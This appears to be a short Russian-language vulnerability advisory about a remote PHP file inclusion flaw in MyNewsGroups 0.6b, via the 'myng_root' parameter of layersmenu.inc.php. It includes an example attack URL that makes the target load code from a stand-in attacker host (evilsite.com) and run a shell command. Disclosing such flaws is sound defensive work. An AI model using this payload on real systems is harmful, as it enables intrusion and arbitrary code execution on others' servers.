• Партнер

  • Программа: MyNewsGroups 🙂 0.6b, возможно другие
    версии.

    Уязвимость позволяет удаленному
    пользователю выполнить произвольный PHP
    сценарий на целевой системе. Уязвимость
    существует из-за недостаточной обработки
    входных данных в параметре "myng_root" в
    сценарии lib/tree/layersmenu.inc.php. Удаленный
    пользователь может выполнить произвольный
    PHP сценарий на целевой системе с
    привилегиями Web сервера.

    Пример:

    http://[target]/lib/tree/layersmenu.inc.php?myng_root =http://evilsite.com/PEAR.php/&cmd=ls

    Подписаться
    Уведомить о
    0 комментариев
    Межтекстовые Отзывы
    Посмотреть все комментарии